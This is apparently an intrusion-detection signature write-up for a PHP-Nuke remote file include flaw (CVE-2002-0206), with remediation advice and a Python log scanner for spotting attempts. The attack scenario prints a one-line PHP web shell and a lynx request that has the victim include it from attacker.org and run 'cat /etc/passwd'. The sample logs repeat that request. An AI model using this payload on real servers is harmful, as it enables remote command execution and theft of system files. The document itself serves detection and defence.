GEN:SID | 1:1399 |
Message | WEB-PHP PHP-Nuke remote file include attempt |
Summary | A remote host may have attempted to make PHP-Nuke's index.php include a file from a remote location.
|
Impact | Possible file disclosure, or command execution at the privilege level of the user running the web server.
|
Detailed Information | The index.php shipped with PHP-Nuke allows inclusion of additional files. Normal usage would be a webmaster who wants to pull additional code into their index.php, which is done via "index.php?file=<path_to_file>". The value is handed to a PHP include without restriction, and PHP's remote file support (allow_url_fopen) lets an include target be fetched over ftp or http as well as from the local disk, so the file may also come from a remote source. This allows an attacker to craft their own PHP file (say, foo.php), host it remotely (say, http://mysite.org/foo.php) and instruct the victim machine to include foo.php as part of its source. Any PHP code in foo.php is executed on the victim machine.
|
Affected Systems | |
Attack Scenarios | In an attempt to gain access to a remote site that happens to use PHP-Nuke, an attacker crafts the following foo.php and places it on a web server he controls (one that serves the file as plain text rather than executing it): <?php system($cmd); ?>
The attacker can then have the victim's index.php include foo.php and execute any command, passing the command as a second query parameter, which the included code sees as $cmd when register_globals is enabled on the victim:
lynx 'http://victim.com/index.php?file=http://attacker.org/foo.php&cmd=cat%20/etc/passwd'
|
Ease of Attack | Simple. Anyone with a web browser and a publicly reachable web server on which they can place files that are viewable from the web.
|
Corrective Action | If you run PHP-Nuke, either upgrade to the latest revision or edit the source to remove support for file inclusion (or restrict it to a fixed list of local files). Disabling allow_url_fopen in php.ini also prevents includes from remote URLs. Check your web logs for attempted file inclusion; if any are found, investigate them as a possible system-level intrusion, since a 200 response to such a request means the remote code was fetched and run.
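The log check recommended above, as an added example that is not part of this signature's documentation or of PHP-Nuke: it scans Apache combined-format log lines for requests to index.php whose file= parameter points at a remote http, https or ftp URL, URL-decoding the query string first so that percent-encoded schemes (http%3A%2F%2F...) are not missed, and pulls out any accompanying cmd= parameter for triage. The log lines, host names and addresses are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample lines in Apache combined log format (not real traffic).
# Line 1: the attack from the scenario above; line 3: the same with a
# percent-encoded FTP URL; line 2: legitimate local include; line 4: a
# remote include against a different script; line 5: unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2002:03:14:07 +0000] "GET /index.php?file=http://attacker.example/foo.php&cmd=cat%20/etc/passwd HTTP/1.0" 200 1532 "-" "Lynx/2.8.4"
198.51.100.22 - - [10/Jan/2002:03:15:01 +0000] "GET /index.php?file=modules/News/index.php HTTP/1.1" 200 8812 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Jan/2002:03:16:40 +0000] "GET /index.php?file=FTP%3A%2F%2Fattacker.example%2Ffoo.php HTTP/1.0" 200 1532 "-" "Lynx/2.8.4"
192.0.2.9 - - [10/Jan/2002:03:17:02 +0000] "GET /modules.php?name=Search&file=http://example.org/x HTTP/1.1" 200 311 "-" "Mozilla/4.0"
192.0.2.9 - - [10/Jan/2002:03:17:30 +0000] "GET /images/logo.gif HTTP/1.1" 200 4411 "-" "Mozilla/4.0"
"""

# Enough of the combined log format to get client, timestamp, request URI and status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def remote_include_attempts(log_text, script="index.php"):
    """Return one dict per request whose `file` parameter is a remote URL.

    `script` limits the check to one PHP script (index.php, the one this
    signature covers); pass None to check every request.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parsed = urllib.parse.urlsplit(m.group("uri"))
        if script is not None and not parsed.path.endswith("/" + script):
            continue
        # parse_qs splits on '&' and percent-decodes, so an encoded scheme
        # or a command passed as a second parameter both come out in clear.
        params = urllib.parse.parse_qs(parsed.query, keep_blank_values=True)
        for value in params.get("file", []):
            if REMOTE_SCHEME.match(value.strip()):
                hits.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "status": int(m.group("status")),
                    "file": value,
                    # register_globals-era exploits pass the command alongside
                    "cmd": params.get("cmd", [None])[0],
                })
    return hits


if __name__ == "__main__":
    for hit in remote_include_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} status={hit['status']} "
              f"file={hit['file']!r} cmd={hit['cmd']!r}")
```

With the default script filter the scan reports the two index.php requests from 203.0.113.7 and ignores the modules.php one; run it with script=None to catch remote includes against any script. A hit with status 200 deserves the intrusion follow-up described above, since the server answered the request normally rather than rejecting it.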
|
Additional References | |
Rule References | bugtraq: 3889
cve: 2002-0206
|